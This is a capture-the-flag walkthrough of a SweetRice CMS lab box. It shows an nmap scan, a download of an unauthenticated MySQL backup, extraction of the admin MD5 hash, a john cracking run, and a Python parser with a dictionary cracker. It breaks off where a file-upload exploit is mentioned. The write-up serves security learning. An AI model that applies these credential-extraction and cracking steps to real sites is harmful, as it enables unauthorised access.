```
# Nmap 7.91 scan initiated Mon Mar 22 17:29:52 2021 as: nmap -sSVC -p- -oA nmap_full 10.10.206.27
Nmap scan report for 10.10.206.27
Host is up (0.035s latency).
Not shown: 65533 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 49:7c:f7:41:10:43:73:da:2c:e6:38:95:86:f8:e0:f0 (RSA)
|   256 2f:d7:c4:4c:e8:1b:5a:90:44:df:c0:63:8c:72:ae:55 (ECDSA)
|_  256 61:84:62:27:c6:c3:29:17:dd:27:45:9e:29:cb:90:5e (ED25519)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Mon Mar 22 17:34:28 2021 -- 1 IP address (1 host up) scanned in 275.92 seconds
```
EDB-ID-40718 describes an easy-to-exploit backup disclosure: the MySQL backup directory is reachable without authentication.
We can directly download /content/inc/mysql_backup/mysql_bakup_20191129023059-1.5.1.sql.
In the dump we can find an INSERT statement whose value is a serialized PHP array (the CMS `global_setting` row):

```sql
INSERT INTO `%--%_options` VALUES(\'1\',\'global_setting\',\'a:17:{s:4:\\"name\\";s:25:\\"Lazy Admin's Website\\";s:6:\\"author\\";s:10:\\"Lazy Admin\\";s:5:\\"title\\";s:0:\\"\\";s:8:\\"keywords\\";s:8:\\"Keywords\\";s:11:\\"description\\";s:11:\\"Description\\";s:5:\\"admin\\";s:7:\\"manager\\";s:6:\\"passwd\\";s:32:\\"42f749ade7f9e195bf475f37a44cafcb\\";s:5:\\"close\\";i:1;s:9:\\"close_tip\\";s:454:\\"<p>Welcome to SweetRice - Thank your for install SweetRice as your website management system.</p><h1>This site is building now , please come late.</h1><p>If you are the webmaster,please go to Dashboard -> General -> Website setting </p><p>and uncheck the checkbox \\"Site close\\" to open your website.</p><p>More help at <a href=\\"http://www.basic-cms.org/docs/5-things-need-to-be-done-when-SweetRice-installed/\\">Tip for Basic CMS SweetRice installed</a></p>\\";s:5:\\"cache\\";i:0;s:13:\\"cache_expired\\";i:0;s:10:\\"user_track\\";i:0;s:11:\\"url_rewrite\\";i:0;s:4:\\"logo\\";s:0:\\"\\";s:5:\\"theme\\";s:0:\\"\\";s:4:\\"lang\\";s:9:\\"en-us.php\\";s:11:\\"admin_email\\";N;}\',\'1575023409\');
```
Inside this configuration we can find the admin account `manager` with the password hash `42f749ade7f9e195bf475f37a44cafcb`.
With haiti (a hash identifier) we can find that the 32-hex-character hash is probably MD5.
Let's hope it's not salted.
```
$ john hash.txt -w=/usr/share/wordlists/passwords/rockyou.txt --format=raw-md5
Using default input encoding: UTF-8
Loaded 1 password hash (Raw-MD5 [MD5 128/128 AVX 4x3])
Warning: no OpenMP support for this hash type, consider --fork=8
Press 'q' or Ctrl-C to abort, almost any other key for status
Password123      (manager)
1g 0:00:00:00 DONE (2021-04-01 09:45) 100.0g/s 3360Kp/s 3360Kc/s 3360KC/s classof2011..181187
Use the "--show --format=Raw-MD5" options to display all of the cracked passwords reliably
Session completed
```
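As an added example (not part of the original writeup, and not SweetRice or john code), the following Python decodes the PHP `serialize()` format used by the `global_setting` row, pulls out the `admin` and `passwd` entries, and checks a candidate against the unsalted MD5 digest, which is what the john run above does at scale. The `SAMPLE` blob is constructed from the dump, trimmed to four keys, and the mini-wordlist is constructed too; the parser handles the full 17-entry array as well. It deliberately rejects `O:` (object) entries, since blindly unserializing objects is the classic PHP object-injection pitfall and only plain data is needed here.

```python
import hashlib

# Constructed sample: the SweetRice global_setting value from the dump, trimmed
# to the keys of interest (the real row is a:17:{...}). PHP serialize() lengths
# are byte counts, so the parser works on bytes.
SAMPLE = (
    b'a:4:{s:5:"admin";s:7:"manager";'
    b's:6:"passwd";s:32:"42f749ade7f9e195bf475f37a44cafcb";'
    b's:5:"close";i:1;s:11:"admin_email";N;}'
)


def _expect(data, pos, token):
    """Consume `token` at `pos` or fail loudly; returns the next offset."""
    if data[pos:pos + len(token)] != token:
        raise ValueError(f"expected {token!r} at offset {pos}")
    return pos + len(token)


def _parse(data, pos):
    """Parse one PHP-serialized value at `pos`; return (value, next_pos)."""
    tag = data[pos:pos + 1]
    if tag == b"N":                                   # N;  -> null
        return None, _expect(data, pos + 1, b";")
    if tag in (b"i", b"d", b"b"):                     # i:123;  d:1.5;  b:1;
        pos = _expect(data, pos + 1, b":")
        end = data.index(b";", pos)
        raw = data[pos:end].decode("ascii")
        value = {b"i": int, b"d": float, b"b": lambda r: r == "1"}[tag](raw)
        return value, end + 1
    if tag == b"s":                                   # s:<len>:"<bytes>";
        pos = _expect(data, pos + 1, b":")
        colon = data.index(b":", pos)
        length = int(data[pos:colon])
        start = _expect(data, colon, b':"')
        value = data[start:start + length]            # length-prefixed: quotes inside are fine
        pos = _expect(data, start + length, b'";')
        return value.decode("utf-8", "replace"), pos
    if tag == b"a":                                   # a:<count>:{ key value ... }
        pos = _expect(data, pos + 1, b":")
        colon = data.index(b":", pos)
        count = int(data[pos:colon])
        pos = _expect(data, colon, b":{")
        result = {}
        for _ in range(count):
            key, pos = _parse(data, pos)
            value, pos = _parse(data, pos)
            result[key] = value
        return result, _expect(data, pos, b"}")
    # O: (objects) and anything else are refused on purpose.
    raise ValueError(f"unsupported type tag {tag!r} at offset {pos}")


def php_unserialize(data):
    """Decode a PHP serialize() string (null, int, float, bool, string, array)."""
    if isinstance(data, str):
        data = data.encode("utf-8")
    value, pos = _parse(data, 0)
    if pos != len(data):
        raise ValueError(f"trailing bytes after offset {pos}")
    return value


def extract_admin_credentials(blob):
    """Return (admin_username, passwd_hash) from a SweetRice global_setting blob."""
    settings = php_unserialize(blob)
    return settings["admin"], settings["passwd"]


def md5_matches(candidate, digest):
    """True if unsalted MD5(candidate) equals the hex digest from the dump."""
    return hashlib.md5(candidate.encode("utf-8")).hexdigest() == digest.lower()


def crack_md5(digest, wordlist):
    """Minimal dictionary attack; returns the first matching word or None."""
    for word in wordlist:
        if md5_matches(word, digest):
            return word
    return None


if __name__ == "__main__":
    user, digest = extract_admin_credentials(SAMPLE)
    print(f"admin user: {user}  hash: {digest}")
    # Constructed mini-wordlist standing in for rockyou.txt.
    print("cracked:", crack_md5(digest, ["admin", "manager", "Password123"]))
```

Feeding it the full `a:17:{...}` value works the same way once the SQL-dump escaping (`\"` around the strings) is stripped; the 454-byte `close_tip` HTML is handled correctly because PHP strings are length-prefixed, not delimiter-terminated.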
By looking again at the source code on the GitHub repository we can see that the admin panel
is stored in the `as` folder. So on the website we need to browse to /content/as/,
where we are facing a login page.
We can use the authenticated file upload exploit. I modified it because the original exploit
was awful.